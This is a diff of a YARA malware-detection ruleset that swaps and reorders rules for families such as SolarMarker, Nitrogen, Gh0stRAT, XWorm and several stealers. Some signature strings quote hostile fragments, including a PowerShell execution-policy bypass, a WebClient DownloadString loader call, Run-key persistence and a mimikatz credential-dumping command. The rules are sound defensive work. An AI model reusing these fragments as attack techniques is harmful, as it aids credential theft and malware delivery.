"8a60a1d770eb4b5048762ddfd4657fdf7a430b09eb454ae5a5bb3103460907db" score = 75 - quality = 81 - tags = "FILE" + quality = 85 + tags = "" strings: - $s1 = {8B C6 E8 F4 FB FF FF} - $s2 = {66 33 D1 66 89 54 58 FE} - $s3 = {7C 53 74 61 72 74 75 70 46 6F 6C 64 65 72 7C} - $s4 = {44 65 6C 70 68 69} - $t1 = {C7 [3] 0B 40 40 00 [6] A1 ?? 61 40 00} - $t2 = {C7 ?? 24 00 40 40 00 A1 ?? 61 40 00} - $t3 = {8B ?? ?? FF D0 B8} + $s1 = "index.php?id=$guid&subid=" + $s2 = "$config" condition: - uint16(0)==0x5A4D and 3 of ($s*) or 2 of ($t*) and filesize <6MB + all of ($s*) } -rule RUSSIANPANDA_Solardropper +rule RUSSIANPANDA_Win_Mal_Koi_Loader_Decrypted : FILE { meta: - description = "SolarMarker first stage detection" + description = "Detects decrypted Koi Loader" author = "RussianPanda" - id = "8e40b001-ae00-5768-bb91-e45264748087" - date = "2024-01-03" - modified = "2024-01-03" - reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/SolarMarker/solardropper.yar#L1-L15" + id = "71de93d3-5c9f-5994-a54d-d4455d500280" + date = "2024-04-04" + modified = "2024-04-04" + reference = "https://github.com/RussianPanda95/Yara-Rules" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/Koi/win_mal_Koi_loader_decrypted.yar#L1-L12" license_url = "N/A" - logic_hash = "5dccb7be94e814335c0c867f8b3dd8855043375fe9f1235d5519c690fc7df842" + hash = "1901593e0299930d46b963866f33a93b" + logic_hash = "f73ada7185ff109afe1e186a0fb7b4420b3d0e04c93c7c5423243db97eb34e49" score = 75 quality = 85 - tags = "" + tags = "FILE" strings: - $p1 = {2d 00 71 00 71 00 78 00 74 00 72 00 61 00 63 00 74 00 3a 00 22 00 3c 00 66 00 69 00 6c 00 71 00 71 00 6e 00 61 00 6d 00 71 00 71 00 3e 00 22 00} - $p2 = "deimos.exe" - $p3 = {5e 00 2d 00 28 00 5b 00 5e 00 3a 00 20 00 5d 00 2b 00 29 00 5b 00 20 00 3a 00 5d 00 3f 00 28 00 5b 00 5e 00 3a 00 5d 00 2a 00 29 00 24 00} + $s1 = {73 00 64 00 32 00 2E 00 70 00 73 00 31 00} + $s2 = {25 00 74 00 65 00 6D 00 70 00 25 00 5C 00 25 00 70 00 61 00 74 00 68 00 73 00 25} condition: - all of ($p*) + uint16(0)==0x5A4D and all of ($s*) } -import "pe" - -rule RUSSIANPANDA_Solarmarker_Loader : FILE +rule RUSSIANPANDA_Win_Mal_Glorysprout_Stealer : FILE { meta: - description = "Detects SolarMarker loader 1-4-2024" + description = "Detects GlorySprout Stealer" author = "RussianPanda" - id = "b385fcd4-62b7-5a83-8a2e-6841fdd17526" - date = "2024-01-04" - modified = "2024-01-04" - reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/SolarMarker/solarmarker_backdoor.yar#L3-L19" + id = "44c50f20-479e-5960-9ab9-97b9a17d7cbf" + date = "2024-03-16" + modified = "2024-03-16" + reference = "https://github.com/RussianPanda95/Yara-Rules" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/GlorySprout/win_mal_GlorySprout_Stealer.yar#L1-L13" license_url = "N/A" - hash = "8eeefe0df0b057fc866b8d35625156de" - logic_hash = "035eccb41f2ecdeb196003542c165cedad96e3e8e741511b4beda3dfe1ece74e" + hash = "8996c252fc41b7ec0ec73ce814e84136be6efef898822146c25af2330f4fd04a" + logic_hash = "c843f7924e69c1b9fc3676178aa630319fe25605deddcd73c4905c51cc97d7eb" score = 75 quality = 85 tags = "FILE" strings: - $s1 = {06 [0-7] 58 D1 8C [3] 01 28 [3] 0A 0A} + $s1 = {25 0F 00 00 80 79 05 48 83 C8 F0 40} + $s2 = {8B 82 A4 00 00 00 8B F9 89 06 8D 4E 0C 8B 82 A8 00 00 00 89 46 04 0F B7 92 AC 00 00 00 89 56 08} + $s3 = {0F B6 06 C1 E7 04 03 F8 8B C7 25 00 00 00 F0 74 0B C1 E8 18} condition: - all of ($s*) and #s1>5 and filesize <7MB and pe.imports("mscoree.dll") + uint16(0)==0x5A4D and all of them and #s1>100 } -rule RUSSIANPANDA_Solarphantom : FILE +rule RUSSIANPANDA_Mal_Nitrogen : FILE { meta: - description = "SolarPhantom Backdoor Detection" + description = "Detects Nitrogen campaign" author = "RussianPanda" - id = "f564a943-e83b-5c1b-ba8c-b227d69d3fd8" - date = "2023-12-11" - modified = "2023-12-11" - reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/SolarMarker/solarphantom.yar#L1-L16" + id = "9d591f87-47ec-54ea-b0ae-26a0542733a0" + date = "2024-02-04" + modified = "2024-02-04" + reference = "https://github.com/RussianPanda95/Yara-Rules" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/Nitrogen/mal_nitrogen.yar#L1-L15" license_url = "N/A" - logic_hash = "3b49d301e625d5abf1b726481a80d6a97d33acd3301c12964f2f37d37130c1b7" + logic_hash = "642d5a16c7fb217a297bba683221de474eb028ac48ec8f52be897eaa056acb9b" score = 75 - quality = 83 + quality = 79 tags = "FILE" strings: - $p1 = {B8 94 E3 46 00 E8 C6 EB FA FF 8B 45 F8} - $p2 = {68 E8 EF 46 00 FF 75 E4} - $p3 = {62 72 76 70 72 66 5f 62 6b 70} + $s1 = {63 7C 77 7B F2 6B 6F C5} + $s2 = {52 09 6A D5 30 36 A5 38} + $s3 = {6F 72 69 67 69 6E 61 6C 5F 69 6E 73 74 61 6C 6C} + $s4 = {43 3A 5C 55 73 65 72 73 5C 50 75 62 6C 69 63 5C 44 6F 77 6E 6C 6F 61 64} + $s5 = {25 00 43 00 55 00 52 00 52 00 45 00 4E 00 54 00 5F 00 44 00 45 00 52 00 45 00 43 00 54 00 4F 00 52 00 59 00 25} + $s6 = {4E 69 74 72 6F 67 65 6E 54 61 72 67 65 74} condition: - uint16(0)==0x5A4D and 1 of ($p*) and filesize <600KB + uint16(0)==0x5A4D and 5 of them } -rule RUSSIANPANDA_Solarmarker_Loader_PS2EXE : FILE +import "pe" + +rule RUSSIANPANDA_Nitrogen_Python311_Rule : FILE { meta: - description = "Detects SolarMarker loader using PS2EXE" + description = "Detects side-loaded Python311 DLL for the new Nitrogen campaign 10-23-2023" author = "RussianPanda" - id = "837883a1-b657-52ae-95c4-ebafc8ac55de" - date = "2024-01-04" - modified = "2024-01-04" - reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/SolarMarker/solarmarker_loader.yar#L1-L17" + id = "608d20b2-24f8-5c95-bab5-83748a7bf3b1" + date = "2023-10-24" + modified = "2023-12-11" + reference = "https://www.esentire.com/blog/persistent-connection-established-nitrogen-campaign-leverages-dll-side-loading-technique-for-c2-communication" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/Nitrogen/nitrogen_python311.yar#L3-L21" license_url = "N/A" - hash = "b45c31679c2516b38c7ff8c395f1d11d" - logic_hash = "4f579f350c3320e7b811cae0efe7302e852f59adc02d805f64ba464f8a995f25" + logic_hash = "04db05b3b130c9de3ff02a6a16775be9d3a50d3025bcf1e075ae56c751304154" score = 75 - quality = 85 + quality = 83 tags = "FILE" strings: - $s1 = {72 7B 02 00 70 72 89 02 00 70 72 91 02 00 70 [22] 72 97 02 00 70 72 AB 02 00 70 72 B5 02 00 70} - $s2 = {13 0D 72 [3] 70} - $s3 = {72 C1 02 00 70 72 B2 03 00 70 72 B8 03 00 70} + $s1 = { 68 62 6F 6B 62 69 30 2F } + $s2 = { 48 B8 ?? ?? ?? ?? ?? ?? ?? 00 48 89 44 24 5C } + $s3 = { 48 8B 05 ?? ?? 09 00} condition: - all of ($s*) and filesize >200MB + all of ($s*) and uint16(0)==0x5A4D and pe.exports("nop") } -rule RUSSIANPANDA_Solarmarker_First_Stage_Payload : FILE +rule RUSSIANPANDA_Mal_Narniarat : FILE { meta: - description = "Detects SolarMarker First Stage payload" + description = "Detects NarniaRAT from BotnetFenix campaign" author = "RussianPanda" - id = "56eec644-9ad7-51db-9d11-68ea3e12c36a" - date = "2024-01-30" - modified = "2024-01-30" - reference = "https://x.com/luke92881/status/1751968350689771966?s=20" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/SolarMarker/solarmarker_first_stage_payload.yar#L1-L21" + id = "64c3a44b-5d75-5fec-bfc1-b66a5eb5780c" + date = "2024-02-02" + modified = "2024-02-02" + reference = "https://github.com/RussianPanda95/Yara-Rules" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/NarniaRAT/mal_NarniaRAT.yar#L1-L16" license_url = "N/A" - hash = "f53563541293a826738d3b8f1164ea43" - logic_hash = "e704614782b0f3cba60c53413e889113d2d44f37e60801205e5ed5ff921b13ee" + hash = "43f6c3f92a025d12de4c4f14afa5d098" + logic_hash = "3ee8bf6b3970c6f56ca98c87752050217e350da160a650e1724b19f340bf0230" score = 75 - quality = 71 + quality = 85 tags = "FILE" strings: - $s1 = {63 72 65 64 75 69} - $s2 = {43 72 65 64 55 49 50 72 6F 6D 70 74 46 6F 72 43 72 65 64 65 6E 74 69 61 6C 73} - $s3 = {50 6F 77 65 72 53 68 65 6C 6C} - $s4 = {73 65 74 5F 43 75 72 73 6F 72 50 6F 73 69 74 69 6F 6E} - $s5 = {73 65 74 5F 41 63 63 65 70 74 42 75 74 74 6F 6E} - $s6 = {4D 65 73 73 61 67 65 42 6F 78 42 75 74 74 6F 6E 73} - $s7 = {41 67 69 6C 65 44 6F 74 4E 65 74 52 54} - $s8 = "_CorExeMain" + $s1 = "client-remote desktop" + $s2 = "SendDataToServer" + $s3 = "SendRunningApps" + $s4 = "SendDataToServer" + $s5 = "SendKeys" + $s6 = "_CorExeMain" condition: - all of them and filesize >250MB + uint16(0)==0x5A4D and 5 of them } -import "pe" - -rule RUSSIANPANDA_Workersdevbackdoor : FILE +rule RUSSIANPANDA_Mal_Cleanuploader : FILE { meta: - description = "Detects WorkersDevBackdoor" + description = "Detects CleanUpLoader" author = "RussianPanda" - id = "725e0924-c108-5927-8d27-e4bc5b284883" - date = "2023-12-15" - modified = "2024-01-05" - reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/WorkersDevBackdoor/WorkDevBackdoor.yar#L3-L20" + id = "fc75fed2-0f8c-55c9-bd10-efe95a678f31" + date = "2024-02-14" + modified = "2024-02-14" + reference = "https://x.com/AnFam17/status/1757871703282077857?s=20" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/CleanUpLoader/mal_cleanuploader.yar#L1-L14" license_url = "N/A" - logic_hash = "f92ad9dc657d87a47e539ea2ee896f9b86bb95e51a890a838c6e6b0efa5deb7d" + hash = "2b62dd154b431d8309002d5b4a35de07" + logic_hash = "a9267c568c11420e36f0781469aa7d932c87d52707981912558eb0f4f84f673a" score = 75 - quality = 85 + quality = 83 tags = "FILE" strings: - $s1 = {72 00 65 00 67 00 69 00 73 00 74 00 65 00 72 00 20 00 7B 00 30 00 7D 00 20 00 7B 00 31 00 7D} - $s2 = {72 FB 00 00 70 72 13 01 00 70 28 20 00 00 0A 72 2D 01 00 70} - $s3 = {55 00 53 00 45 00 52 00 44 00 4F 00 4D 00 41 00 49 00 4E} - $s4 = {43 00 4F 00 4D 00 50 00 55 00 54 00 45 00 52 00 4E 00 41 00 4D 00 45} + $s1 = {0F B6 80 30 82 42 00 88} + $s2 = {44 69 73 6B 43 6C 72} + $s3 = {49 00 6E 00 73 00 74 00 61 00 6C 00 6C 00 20 00 45 00 64 00 67 00 65} condition: - 3 of ($s*) and pe.imports("mscoree.dll") and filesize <2MB + uint16(0)==0x5A4D and all of them and #s1>15 } -rule RUSSIANPANDA_Workersdevbackdoor_PS : FILE +rule RUSSIANPANDA_Gh0Strat : FILE { meta: - description = "Detects WorkersDevBackdoor PowerShell script" + description = "Detects Gh0stRAT" author = "RussianPanda" - id = "d2b526c1-a9f5-57de-818c-99b02e778a0d" - date = "2023-12-15" - modified = "2023-12-15" + id = "db310549-feed-57b8-9ec0-232b6eda62f9" + date = "2024-07-09" + modified = "2024-07-09" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/WorkersDevBackdoor/WorkersDevBackdoor_PS.yar#L1-L18" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/Gh0stRAT/Gh0stRAT.yar#L1-L14" license_url = "N/A" - logic_hash = "c71eed8fd7a44f3018150cc6ef55d10779093ed8e4c77fd9babcf9b1b9fadfda" + hash = "678b06ecdbc9b186788cf960332566f9" + logic_hash = "bc4bdad83a0e23273774c3d4812cabe9fa44897c8ff2e308004e03b4f1622cd5" score = 75 quality = 85 tags = "FILE" strings: - $s1 = "sleep" wide - $s2 = "convertto-securestring" wide - $s3 = "System.Drawing.dll" wide - $s4 = "System.Web.Extensions.dll" wide - $s5 = "System.Windows.Forms.dll" wide - $s6 = "CSharp" wide + $s1 = "SAM\\SAM\\Domains\\Account\\Users\\Names\\%s" + $s2 = "GetMP privilege::debug sekurlsa::logonpasswords exit" + $s3 = "Http/1.1 403 Forbidden" + $s4 = "WinSta0\\Default" condition: - all of ($s*) and filesize <200KB + uint16(0)==0x5A4D and all of them } -rule RUSSIANPANDA_Win_Mal_Glorysprout_Stealer : FILE +import "pe" + +rule RUSSIANPANDA_Swaetrat { meta: - description = "Detects GlorySprout Stealer" + description = "Detects SwaetRAT" author = "RussianPanda" - id = "44c50f20-479e-5960-9ab9-97b9a17d7cbf" - date = "2024-03-16" - modified = "2024-03-16" + id = "e5238ae4-7ae3-505c-a3fd-ecf6be608fac" + date = "2023-11-27" + modified = "2023-11-27" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/GlorySprout/win_mal_GlorySprout_Stealer.yar#L1-L13" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/SwaetRAT/swaetrat.yar#L3-L19" license_url = "N/A" - hash = "8996c252fc41b7ec0ec73ce814e84136be6efef898822146c25af2330f4fd04a" - logic_hash = "c843f7924e69c1b9fc3676178aa630319fe25605deddcd73c4905c51cc97d7eb" + logic_hash = "4dc1107a34d678c3fa0939fab7986fe744ac246400823d08b1ab6db0942821da" score = 75 quality = 85 - tags = "FILE" + tags = "" strings: - $s1 = {25 0F 00 00 80 79 05 48 83 C8 F0 40} - $s2 = {8B 82 A4 00 00 00 8B F9 89 06 8D 4E 0C 8B 82 A8 00 00 00 89 46 04 0F B7 92 AC 00 00 00 89 56 08} - $s3 = {0F B6 06 C1 E7 04 03 F8 8B C7 25 00 00 00 F0 74 0B C1 E8 18} + $s2 = "Pong" + $s3 = "ReadData" + $s4 = "DeskDrop" wide + $s5 = "OfflineGet" wide condition: - uint16(0)==0x5A4D and all of them and #s1>100 + all of ($s*) and pe.imports("mscoree.dll") } -rule RUSSIANPANDA_Win_Mal_Planetstealer : FILE +rule RUSSIANPANDA_Whitesnakestealer : FILE { meta: - description = "Detects PlanetStealer" + description = "WhiteSnake Stealer" author = "RussianPanda" - id = "f912066f-4151-5f83-8d34-6bffdf9e25e5" - date = "2024-03-04" - modified = "2024-03-24" - reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/PlanetStealer/win_mal_PlanetStealer.yar#L1-L14" + id = "70b69aba-5096-59a6-bb0b-44d248aecc26" + date = "2023-07-04" + modified = "2023-12-11" + reference = "https://russianpanda.com/2023/07/04/WhiteSnake-Stealer-Malware-Analysis/" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/WhiteSnake-Stealer/WhiteSnake_rc4.yar#L1-L17" license_url = "N/A" - logic_hash = "e1660d6fed4c48b45b40bd51fb52254c5b19ca6f1938b68f2344bde473820b86" + logic_hash = "24985a2c3b0d72858decd17cb2b8e485caa94c01ad72a014edc68ed4facfd71e" score = 75 - quality = 79 + quality = 83 tags = "FILE" strings: - $s1 = {48 8D 15 ?? ?? ?? 00 0F B6 34 10 0F B6 BC 04 ?? ?? 00 00 ?? ?? 40 88 ?? 04 ?? ?? 00 00 48 FF C0} - $s2 = {48 83 F8 ?? 7C DA} - $s3 = {72 75 6E 74 69 6D 65 2E 67 6F 62 75 66} - $s4 = {74 6F 74 61 6C 5F 77 61 6C 6C 65 74 73} - $s5 = {74 6F 74 61 6C 5F 63 6F 6F 6B 69 65 73} + $s1 = {73 68 69 74 2e 6a 70 67} + $s2 = {FE 0C ?? 00 20 00 01 00 00 3F ?? FF FF FF 20 00 00 00 00 FE 0E ?? 00 38 ?? 00 00 00 FE 0C} + $s3 = "qemu" wide + $s4 = "vbox" wide condition: - uint16(0)==0x5A4D and all of them and #s2>100 and #s1>100 and filesize <20MB + all of ($s*) and filesize <300KB } -rule RUSSIANPANDA_Mal_Xred_Backdoor : FILE +rule RUSSIANPANDA_Whitesnakestealer_1 : FILE { meta: - description = "Detects XRed backdoor" + description = "Detects WhiteSnake Stealer XOR samples " author = "RussianPanda" - id = "61f5fcb8-9351-5db0-8bce-123c96d2a443" - date = "2024-02-09" - modified = "2024-02-09" - reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/XRed_Backdoor/mal_xred_backdoor.yar#L1-L18" + id = "cfe168a6-cc2f-5cfe-985c-78b232dc2651" + date = "2023-07-04" + modified = "2023-12-11" + reference = "https://russianpanda.com/2023/07/04/WhiteSnake-Stealer-Malware-Analysis/" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/WhiteSnake-Stealer/WhiteSnake_xor.yar#L1-L15" license_url = "N/A" - hash = "9e1fbae3a659899dde8db18a32daa46a" - logic_hash = "36d138a0efade1d5c075662dc528235fe66b49879730db78c4c7290fec7420b5" + logic_hash = "0bd0e250b8598be297296ecf6644d3bf649e3dc4598438325a0913afed04c819" score = 75 - quality = 73 + quality = 83 tags = "FILE" strings: - $s1 = {4B 65 79 62 6F 61 72 64 20 48 6F 6F 6B 20 2D 3E 20 41 63 74 69 76 65} - $s2 = {54 43 50 20 43 6C 69 65 6E 74 20 2D 3E 20 41 6B 74 69 66} - $s3 = {55 53 42 20 48 6F 6F 6B 73 20 2D 3E 20 41 63 74 69 76 65} - $s4 = {45 58 45 55 52 4C 31} - $s5 = {49 4E 49 55 52 4C 33} - $s6 = {58 52 65 64 35 37} + $s1 = {FE 0C 00 00 FE 09 00 00 FE 0C 02 00 6F ?? 00 00 0A FE 0C 03 00 61 D1 FE 0E 04 00 FE} + $s2 = {61 6e 61 6c 2e 6a 70 67} condition: - uint16(0)==0x5A4D and 3 of them + all of ($s*) and filesize <600KB } -import "pe" - -rule RUSSIANPANDA_Swaetrat +rule RUSSIANPANDA_Jinxloader : FILE { meta: - description = "Detects SwaetRAT" + description = "Detects JinxLoader Golang version" author = "RussianPanda" - id = "e5238ae4-7ae3-505c-a3fd-ecf6be608fac" - date = "2023-11-27" - modified = "2023-11-27" + id = "25570c99-5938-5be0-a153-a07be0d0571c" + date = "2024-01-02" + modified = "2024-01-02" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/SwaetRAT/swaetrat.yar#L3-L19" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/JinxLoader/JinxLoader-1-2-2024.yar#L1-L16" license_url = "N/A" - logic_hash = "4dc1107a34d678c3fa0939fab7986fe744ac246400823d08b1ab6db0942821da" + hash = "6bd7ff5d764214f239af2bb58b368308c2d04f1147678c2f638f37a893995f71" + logic_hash = "13dee435fb4d40c629c0a30b6f655b87f14b10a6f6acf61d00e6c692c9bb0ff1" score = 75 - quality = 85 - tags = "" + quality = 81 + tags = "FILE" strings: - $s2 = "Pong" - $s3 = "ReadData" - $s4 = "DeskDrop" wide - $s5 = "OfflineGet" wide + $s1 = {72 75 6E 74 69 6D 65 2E 67 6F 70 61 6E 69 63} + $s2 = {48 8D 05 4D 6E 07 00 BB 0A 00 00 00} + $s3 = {73 65 6C 66 5F 64 65 73 74 72 75 63 74 2E 62 61 74} + $s4 = {48 8D 1D B7 24 08 00 [25] E8 EF FC E4 FF} condition: - all of ($s*) and pe.imports("mscoree.dll") + uint16(0)==0x5A4D and all of ($s*) and filesize <9MB } -rule RUSSIANPANDA_Smartapesg_JS_Dropper_Stage1 : FILE +rule RUSSIANPANDA_Win_Mal_Xworm : FILE { meta: - description = "Detects SmartApeSG initial JavaScript file" + description = "Detects XWorm RAT" author = "RussianPanda" - id = "9513f323-c315-5ae2-92a5-c831d0a7ce2a" - date = "2024-01-11" - modified = "2024-01-11" - reference = "https://medium.com/walmartglobaltech/smartapesg-4605157a5b80" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/SmartApeSG/SmartApeSG_JS_dropper_stage1.yar#L1-L18" + id = "5701f382-3c97-5a00-9673-6c39b0f11cc2" + date = "2024-03-11" + modified = "2024-03-11" + reference = "https://github.com/RussianPanda95/Yara-Rules" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/XWorm/win_mal_XWorm.yar#L1-L15" license_url = "N/A" - hash = "8769d9ebcf14b24a657532cd96f9520f54aa0e799399d840285311dfebe3fb15" - logic_hash = "de7e4ec30c780699b46de7baf2a916fdb7331da2ee7c2d637422ea664cd03b82" + hash = "fc422800144383ef6e2e0eee37e7d6ba" + logic_hash = "c42544285517dc61628e8df2ee5ab6733924fbb2cc08b9b2df273eec0a401d90" score = 75 quality = 85 tags = "FILE" strings: - $a1 = "'GE'+'T'" - $a2 = "'GE','T'" - $s1 = "pt.Creat" - $s2 = "L2.ServerX" - $s3 = "ponseText" - $s4 = "MLHTTP.6.0" - $s5 = /\/news\.php\?([0-9]|[1-9][0-9]|100)/ + $s1 = {4D 00 6F 00 64 00 69 00 66 00 69 00 65 00 64 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 66 00 75 00 6C 00 6C 00 79 00 21} + $s2 = {50 00 6C 00 75 00 67 00 69 00 6E 00 73 00 20 00 52 00 65 00 6D 00 6F 00 76 00 65 00 64 00 21} + $s3 = {73 00 65 00 6E 00 64 00 50 00 6C 00 75 00 67 00 69 00 6E} + $s4 = {4D 00 6F 00 64 00 69 00 66 00 69 00 65 00 64 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 66 00 75 00 6C 00 6C 00 79 00 21} + $s5 = "_CorExeMain" condition: - all of ($s*) and filesize <1MB and any of ($a*) + uint16(0)==0x5A4D and all of them } -rule RUSSIANPANDA_Smartapesg_JS_Netsupportrat_Stage2 : FILE +rule RUSSIANPANDA_Darkvnc : FILE { meta: - description = "Detects SmartApeSG JavaScript Stage 2 retrieving NetSupportRAT" + description = "Detects DarkVNC" author = "RussianPanda" - id = "2a614e11-be32-5bf1-9fd1-da224f0a644e" - date = "2024-01-11" - modified = "2024-01-12" + id = "dbc86ac8-5ea3-59a7-b3ab-68c603165720" + date = "2024-01-15" + modified = "2024-01-15" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/SmartApeSG/SmartApeSG_JS_NetSupportRAT_stage2.yar#L1-L23" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/DarkVNC/darkvnc.yar#L1-L15" license_url = "N/A" - hash = "67d8f84b37732cf85e05b327ad6b6a9f" - logic_hash = "5a2afaa14d513e0a3c4e52acfb433e53a4541983a05d15318a217c14dc06453c" + hash = "3c74dccd06605bcf527ffc27b3122959" + logic_hash = "1dd1246e0b22181706433f0cff9b231017e747d8faaa2db4cb9adefeab492ab7" score = 75 quality = 85 tags = "FILE" strings: - $x1 = "powershell.exe -Ex Bypass -NoP -C $" - $x2 = "Get-Random -Minimum -1000 -Maximum 1000" - $s1 = "HKCU:\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run" - $s2 = "=new ActiveXObject('W" - $s3 = "System.Net.WebClient).DownloadString($" - $s4 = "FromBase64String" - $s5 = "Start-Process -FilePath $" + $s1 = {66 89 84 24 ?? 00 00 00 B8 ?? 00 00 00} + $s2 = {66 31 14 41 48} + $s3 = "VncStopServer" + $s4 = "VncStartServer" condition: - filesize <1MB and ((1 of ($x*) and 3 of them ) or 5 of them ) + uint16(0)==0x5A4D and 3 of them and filesize <700KB } -rule RUSSIANPANDA_Fakebat_Powershell +rule RUSSIANPANDA_Win_Mal_Planetstealer : FILE { meta: - description = "Detects FakeBat PowerShell scripts" + description = "Detects PlanetStealer" author = "RussianPanda" - id = "76149a6f-c370-5e48-82cc-c89b545c0aa8" - date = "2023-12-01" - modified = "2023-12-01" + id = "f912066f-4151-5f83-8d34-6bffdf9e25e5" + date = "2024-03-04" + modified = "2024-03-24" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/FakeBat/fakebat_powershell.yar#L1-L13" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/PlanetStealer/win_mal_PlanetStealer.yar#L1-L14" license_url = "N/A" - logic_hash = "df6b30d97ac6c9b248fed0d901e8a0a6ad1d855483a5006b008b839d9961092a" + logic_hash = "e1660d6fed4c48b45b40bd51fb52254c5b19ca6f1938b68f2344bde473820b86" score = 75 - quality = 85 - tags = "" + quality = 79 + tags = "FILE" strings: - $s1 = "$LoadDomen/?status=start&av=" nocase - $s2 = "$xxx.gpg" nocase + $s1 = {48 8D 15 ?? ?? ?? 00 0F B6 34 10 0F B6 BC 04 ?? ?? 00 00 ?? ?? 40 88 ?? 04 ?? ?? 00 00 48 FF C0} + $s2 = {48 83 F8 ?? 7C DA} + $s3 = {72 75 6E 74 69 6D 65 2E 67 6F 62 75 66} + $s4 = {74 6F 74 61 6C 5F 77 61 6C 6C 65 74 73} + $s5 = {74 6F 74 61 6C 5F 63 6F 6F 6B 69 65 73} condition: - all of ($s*) + uint16(0)==0x5A4D and all of them and #s2>100 and #s1>100 and filesize <20MB } rule RUSSIANPANDA_Darkgate_Autoit { @@ -208075,7 +210017,7 @@ rule RUSSIANPANDA_Darkgate_Autoit date = "2024-01-26" modified = "2024-01-26" reference = "https://yara.readthedocs.io/en/stable/writingrules.html?highlight=xor" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/DarkGate/darkgate_autoit.yar#L1-L19" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/DarkGate/darkgate_autoit.yar#L1-L19" license_url = "N/A" hash = "e1803b01e3f187355dbeb87a0c91b76c" logic_hash = "dda6726d09035d6f61ca331d18ed37f032c6f6a5ab88e1754a21587f4c79ac87" @@ -208095,60 +210037,35 @@ rule RUSSIANPANDA_Darkgate_Autoit condition: 3 of ($s*) and $h } -rule RUSSIANPANDA_Win_Mal_Mpxdropper : FILE +rule RUSSIANPANDA_Mal_Asuka_Stealer : FILE { meta: - description = "Detects MpxDropper" + description = "Detects AsukaStealer" author = "RussianPanda" - id = "26ee0a12-c727-5953-8ebb-dd8a8d772561" - date = "2024-03-01" - modified = "2024-03-01" + id = "a718be5f-dc76-5610-9237-038a9719d7e5" + date = "2024-02-02" + modified = "2024-03-18" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/MpxDropper/mal_win_MpxDropper.yar#L1-L11" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/AsukaStealer/mal_asuka_stealer.yar#L1-L12" license_url = "N/A" - hash = "3a44a45afbfe5fc7cdeb3723e05c4e892b079abdb7d1e8d6fc70496ef0a14d5d" 